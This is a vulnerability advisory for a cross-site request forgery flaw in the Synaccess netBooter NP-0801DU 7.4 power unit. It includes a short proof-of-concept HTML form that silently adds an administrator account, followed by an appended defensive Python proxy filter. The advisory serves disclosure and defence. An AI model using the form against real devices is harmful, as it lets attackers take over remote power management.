Synaccess netBooter NP-0801DU 7.4 Cross Site Request Forgery

Synaccess netBooter NP-0801DU version 7.4 suffers from a cross site request forgery vulnerability.

MD5 | c58aeb7ef6b68b80d63bcfe2db7d1b15


Synaccess netBooter NP-0801DU 7.4 CSRF Add Admin Exploit

Vendor: Synaccess Networks Inc.
Product web page:
Affected version: NP-0801DU (HW6.0 BL1.5 FW7.23 WF7.4)

Summary: netBooter NP-0801DU and NP-0801DUH PDUs provide secured
remote power source management of 8 independent outlets. Includes
true RMS AC current reading and environment temperature monitoring
via TCP/IP networks or local direct connection.

Desc: The application interface allows users to perform certain
actions via HTTP requests without performing any validity checks
to verify the requests. This can be exploited to perform certain
actions with administrative privileges if a logged-in user visits
a malicious web site.

Tested on: Synaccess server

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic

Advisory ID: ZSL-2018-5501
Advisory URL:



<form action="" method="POST">
<input type="hidden" name="add1" value="Nimda" />
<input type="hidden" name="add2" value="123456" />
<input type="hidden" name="add3" value="123456" />
<input type="hidden" name="adm0" value="1" />
<input type="submit" value="Gou" />
</form>
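
The validity check that the description says is missing can be enforced in front of the device, for example in a reverse proxy that rejects state-changing requests not initiated from the device's own pages. This is an added example, not code from the advisory or the vendor: DEVICE_HOST, the function names and the sample requests are assumptions constructed for illustration, and only the field names come from the form above.

```python
from urllib.parse import urlsplit, parse_qs

# Assumption: hostname of the PDU web interface as the proxy sees it (constructed).
DEVICE_HOST = "pdu.example.internal"
# Field names taken from the proof-of-concept form in this advisory.
ACCOUNT_FIELDS = {"add1", "add2", "add3", "adm0"}
SAFE_METHODS = {"GET", "HEAD", "OPTIONS"}

def source_host(headers):
    """Host of the page that initiated the request (Origin, then Referer), or None."""
    lowered = {k.lower(): v for k, v in headers.items()}
    for name in ("origin", "referer"):
        value = lowered.get(name)
        if value:
            return urlsplit(value).hostname  # "null" and junk values yield None
    return None

def allow_request(method, headers, device_host=DEVICE_HOST):
    """Allow state-changing requests only when they come from the device's own pages."""
    if method.upper() in SAFE_METHODS:
        return True
    host = source_host(headers)
    # Fail closed: a missing or opaque origin is treated as cross-site.
    return host is not None and host == device_host.lower()

def touches_accounts(body):
    """True when the form body carries any of the account fields from the PoC."""
    return bool(ACCOUNT_FIELDS & set(parse_qs(body, keep_blank_values=True)))

def decide(method, headers, body):
    """Return 'allow', 'block', or 'block+alert' for account-changing cross-site posts."""
    if allow_request(method, headers):
        return "allow"
    return "block+alert" if touches_accounts(body) else "block"

# Constructed sample requests: (method, headers, urlencoded body).
BODY = "add1=operator&add2=example&add3=example&adm0=1"
SAMPLES = [
    ("POST", {"Origin": "http://pdu.example.internal"}, BODY),
    ("POST", {"Origin": "https://other-site.example"}, BODY),
    ("POST", {}, BODY),
    ("POST", {"Referer": "https://other-site.example/page"}, "unrelated=1"),
    ("GET", {}, ""),
]

if __name__ == "__main__":
    for method, headers, body in SAMPLES:
        print(method, headers, "->", decide(method, headers, body))
```

The host comparison ignores scheme and port, and treating GET as safe assumes the device changes state only through POST, as in the form above.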
